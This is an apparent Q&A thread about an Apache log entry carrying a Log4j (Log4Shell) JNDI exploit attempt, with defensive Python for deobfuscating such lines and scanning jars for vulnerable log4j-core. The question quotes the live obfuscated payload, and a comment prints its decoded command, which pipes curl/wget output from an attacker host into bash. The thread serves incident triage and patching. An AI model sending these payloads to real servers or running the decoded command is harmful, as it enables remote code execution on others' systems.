
I see this entry in my Apache access log. Does anyone have an idea what it means?

 195.54.160.149 - - [24/Dec/2021:17:30:03 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA==} HTTP/1.1" 200 10937 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA==}"
Aadam
  • That is a hacking string trying to connect to an LDAP server from your website's IP. The HTTP return code is 200, so it has been processed correctly in some way by your website. You should investigate it further just in case your website is hacked. Depending on how you manage non-existing pages, it could also be a false alarm. – masterguru Dec 24 '21 at 18:22
  • When that base64 code is decoded, it shows this: `(curl -s 195.54.160.149:5874/139.59.37.244:443||wget -q -O- 195.54.160.149:5874/139.59.37.244:443)|bash`, so again it is trying to use your webserver to hack other places. – masterguru Dec 24 '21 at 18:23
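An added example, not from the question or the comments, of the triage a defender would run over lines like the one above: it parses the combined-format entry, resolves the `${lower:…}` and `${::-…}` spelling tricks the referer and user-agent fields use (a scanner that only matches the literal `${jndi:` misses both), pulls out every JNDI lookup, and decodes the Base64 command carried in the LDAP path. The field names, the combined-log regex and the `/Base64/` path convention are assumptions taken from the shape of this one line; the sample input is the line from the question, reproduced verbatim.

```python
import base64
import re
from typing import Dict, List, Optional

# Apache "combined" log format, the layout of the line in the question (assumed).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Innermost Log4j lookups that attackers use only to spell characters, so that
# a naive search for the literal "${jndi:" misses the payload:
#   ${lower:J} -> j     ${upper:j} -> J     ${::-j} -> j     ${env:NOPE:-j} -> j
LOWER_RE = re.compile(r'\$\{lower:([^${}]*)\}', re.IGNORECASE)
UPPER_RE = re.compile(r'\$\{upper:([^${}]*)\}', re.IGNORECASE)
DEFAULT_RE = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')

# A fully resolved lookup: ${jndi:<scheme>://<target>}
JNDI_RE = re.compile(r'\$\{jndi:([a-z]+)://([^}]+)\}', re.IGNORECASE)

# Path shape used by the attacker's LDAP server in the question:
# .../Basic/Command/Base64/<base64 shell command>   (assumed convention)
B64_PATH_RE = re.compile(r'/Base64/([A-Za-z0-9+/=]+)')


def deobfuscate(value: str, max_rounds: int = 20) -> str:
    """Resolve nested lower/upper/default-value lookups until nothing changes."""
    for _ in range(max_rounds):
        new = LOWER_RE.sub(lambda m: m.group(1).lower(), value)
        new = UPPER_RE.sub(lambda m: m.group(1).upper(), new)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def decode_payload(target: str) -> Optional[str]:
    """Decode the Base64 command embedded in the LDAP path, if there is one."""
    m = B64_PATH_RE.search(target)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def analyze_line(line: str) -> Dict[str, object]:
    """Parse one combined-format line and report every JNDI lookup it carries."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return {"parsed": False, "hits": []}
    hits: List[Dict[str, object]] = []
    # The lookup fires wherever the string gets logged, so scan every
    # attacker-controlled field, not just the request line.
    for field in ("request", "referer", "agent"):
        raw = m.group(field)
        if "${" not in raw:
            continue
        resolved = deobfuscate(raw)
        for j in JNDI_RE.finditer(resolved):
            target = j.group(2)
            hits.append({
                "field": field,
                "obfuscated": resolved != raw,
                "scheme": j.group(1).lower(),
                "target": target,
                "command": decode_payload(target),
            })
    return {"parsed": True, "ip": m.group("ip"), "status": m.group("status"), "hits": hits}


# Sample input: the line from the question, reproduced verbatim.
PAYLOAD = (
    "195.54.160.149:12344/Basic/Command/Base64/"
    "KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8"
    "d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA=="
)
SAMPLE_LINE = (
    '195.54.160.149 - - [24/Dec/2021:17:30:03 +0000] '
    '"GET /?x=${jndi:ldap://' + PAYLOAD + '} HTTP/1.1" 200 10937 '
    '"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://' + PAYLOAD + '}" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://' + PAYLOAD + '}"'
)

if __name__ == "__main__":
    for hit in analyze_line(SAMPLE_LINE)["hits"]:
        print(hit["field"], hit["scheme"], hit["obfuscated"], hit["command"])
```

The 200 from Apache only says the web server served the page; whether the lookup actually fired depends on whether some Java component behind it logged one of these fields with a vulnerable Log4j. Hits with `obfuscated` set are the ones a literal `${jndi:` match would have missed, which is why the referer and user-agent fields are scanned too.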

1 Answer


This is an exploit for the recent Log4j vulnerability. If you use Log4j anywhere you should ensure it is updated immediately. Otherwise, it's safe to disregard the attacks.

There is currently mass exploitation of this issue, so you will undoubtedly see these requests for a long time to come.

VirtueKB
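An added example, not part of the answer, of the check the answer calls for ("if you use Log4j anywhere"): a small inventory scanner that walks a directory for jars, wars and ears, descends into nested archives (where application servers usually hide their copy of log4j-core), and reports each log4j-core it finds with its version and whether `JndiLookup.class` is still present. The directory layout in `run_demo()` is constructed in a temporary folder and the class files inside the jars are placeholder bytes, not real bytecode. The 2.15.0 threshold is the release that disabled the original lookup; the later advisories moved the recommended floor to 2.17.1 (2.12.4 and 2.3.2 on the older branches), so treat the `vulnerable` flag as a triage hint, not a verdict.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

# The class that performs JNDI lookups in Log4j 2.x; deleting it from the jar
# was one of the published mitigations, so its presence is the first thing an
# inventory should report.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VERSION_RE = re.compile(r"^version=(\d+)\.(\d+)\.(\d+)", re.MULTILINE)
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties: str) -> Optional[Tuple[int, ...]]:
    """Read the version line of a Maven pom.properties file as a tuple."""
    m = VERSION_RE.search(pom_properties)
    return tuple(int(x) for x in m.groups()) if m else None


def _inspect_zip(zf: zipfile.ZipFile, label: str, findings: List[Dict[str, object]]) -> None:
    names = set(zf.namelist())
    has_lookup = JNDI_LOOKUP_CLASS in names
    if POM_PROPS in names or has_lookup:
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace")) if POM_PROPS in names else None
        # 2.15.0 disabled the original lookup; an unknown version with the
        # class still present is treated as suspect rather than ignored.
        findings.append({
            "path": label,
            "version": version,
            "jndi_lookup_present": has_lookup,
            "vulnerable": has_lookup and (version is None or version < (2, 15, 0)),
        })
    # WAR/EAR/fat jars bundle log4j-core inside; recurse into nested archives.
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _inspect_zip(inner, f"{label}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk root and return one finding per log4j-core found, nested ones included."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, f)
            try:
                with zipfile.ZipFile(path) as zf:
                    _inspect_zip(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _make_jar(path: str, version: str, keep_lookup: bool) -> None:
    """Constructed stand-in for a log4j-core jar; class bodies are placeholder bytes."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if keep_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def run_demo() -> Dict[str, Dict[str, object]]:
    """Build a constructed tree (assumed layout) and return findings keyed by relative path."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    _make_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
    _make_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)  # class removed
    _make_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1", True)  # class present, JNDI off by default
    inner = os.path.join(root, "inner.tmp")
    _make_jar(inner, "2.13.3", True)
    with open(inner, "rb") as fh, zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", fh.read())  # nested copy
    os.remove(inner)
    return {f["path"][len(root) + 1:]: f for f in scan_tree(root)}


if __name__ == "__main__":
    for rel, finding in run_demo().items():
        print(rel, finding["version"], finding["jndi_lookup_present"], finding["vulnerable"])
```

Point `scan_tree()` at the application directories of a real host to get the same findings for real jars; the nested-archive descent is what catches the copy of log4j-core shipped inside a deployed WAR, which a plain filename search for `log4j-core-*.jar` would miss.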